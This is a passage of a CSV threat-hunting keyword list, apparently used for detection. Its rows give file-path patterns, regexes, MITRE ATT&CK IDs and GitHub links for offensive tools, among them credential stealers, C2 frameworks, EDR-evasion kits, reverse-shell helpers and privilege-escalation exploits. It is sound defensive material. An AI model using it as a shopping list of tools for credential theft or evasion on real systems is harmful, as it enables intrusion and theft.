Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*\exe_to_dll\*",".{0,1000}\\exe_to_dll\\.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*\execute_shellcode.exe*",".{0,1000}\\execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\Execute-DNSTXT-Code.ps1*",".{0,1000}\\Execute\-DNSTXT\-Code\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Exegol-*.zip*",".{0,1000}\\Exegol\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\exegol.py*",".{0,1000}\\exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\Exegol-images-*.zip*",".{0,1000}\\Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*\Exegol-images-*\*docker*",".{0,1000}\\Exegol\-images\-.{0,1000}\\.{0,1000}docker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\exetotext.ps1*",".{0,1000}\\exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\exfilGui.ps1*",".{0,1000}\\exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*\exfiltrate.exe*",".{0,1000}\\exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\exocet.elf*",".{0,1000}\\exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery 
tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\exocet.exe*",".{0,1000}\\exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\ExpandArchiveCommand.cs",".{0,1000}\\ExpandArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\exploit.c",".{0,1000}\\exploit\.c","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\exploit.dll*",".{0,1000}\\exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\ExploitElevate.cpp*",".{0,1000}\\ExploitElevate\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 
"*\ExportCsvCommand.cs",".{0,1000}\\ExportCsvCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\exported_credentials.csv*",".{0,1000}\\exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*\ext_hijacker.h*",".{0,1000}\\ext_hijacker\.h.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\ExtensionSpoof.exe*",".{0,1000}\\ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - 
TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExtensionSpoof.sln*",".{0,1000}\\ExtensionSpoof\.sln.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExtensionSpoofer\*",".{0,1000}\\ExtensionSpoofer\\.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExternalC2\*",".{0,1000}\\ExternalC2\\.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\extract_wifi.exe*",".{0,1000}\\extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\FakeCmdLine*",".{0,1000}\\FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\FastPathMITM.py*",".{0,1000}\\FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\fenty.py*",".{0,1000}\\fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game 
Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*\Ferrari.ps1*",".{0,1000}\\Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\Fertliser.exe*",".{0,1000}\\Fertliser\.exe.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*\Fertliser.pdb*",".{0,1000}\\Fertliser\.pdb.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*\FileCrawlerMITM.py*",".{0,1000}\\FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\Files\ContainersFileUrls.txt*",".{0,1000}\\Files\\ContainersFileUrls\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\filetransfer.py*",".{0,1000}\\filetransfer\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - 
TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*\find-computer.py*",".{0,1000}\\find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\firefox\getCredsfirefox.h*",".{0,1000}\\firefox\\getCredsfirefox\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\firefox\getCredsfirefox2.h*",".{0,1000}\\firefox\\getCredsfirefox2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\follina.py*",".{0,1000}\\follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*\Forensike.dmp*",".{0,1000}\\Forensike\.dmp.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash 
dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\Forensike.ps1*",".{0,1000}\\Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\forensike_results.txt*",".{0,1000}\\forensike_results\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ForkDump.cpp*",".{0,1000}\\ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" 
"*\ForkDump.exe*",".{0,1000}\\ForkDump\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkDump.vcxproj*",".{0,1000}\\ForkDump\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkLib.cpp*",".{0,1000}\\ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkLib.vcxproj*",".{0,1000}\\ForkLib\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\ForkPlayground.sln*",".{0,1000}\\ForkPlayground\.sln.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*\FormatListCommand.cs",".{0,1000}\\FormatListCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\FormatTableCommand.cs",".{0,1000}\\FormatTableCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\freeze.go",".{0,1000}\\freeze\.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan\common\proxy*",".{0,1000}\\fscan\\common\\proxy.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan\WebScan\pocs\*",".{0,1000}\\fscan\\WebScan\\pocs\\.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan32.exe*",".{0,1000}\\fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscan64.exe*",".{0,1000}\\fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*\fscanarm64.exe*",".{0,1000}\\fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscanarmv6.exe*",".{0,1000}\\fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\fscanarmv7.exe*",".{0,1000}\\fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*\FtpC2\*",".{0,1000}\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*\FudgeC2*",".{0,1000}\\FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*\FWUprank.ps1",".{0,1000}\\FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 
- T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\gcloud\application_default_credentials.json*",".{0,1000}\\gcloud\\application_default_credentials\.json.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\geacon\tools\BeaconTool\*",".{0,1000}\\geacon\\tools\\BeaconTool\\.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 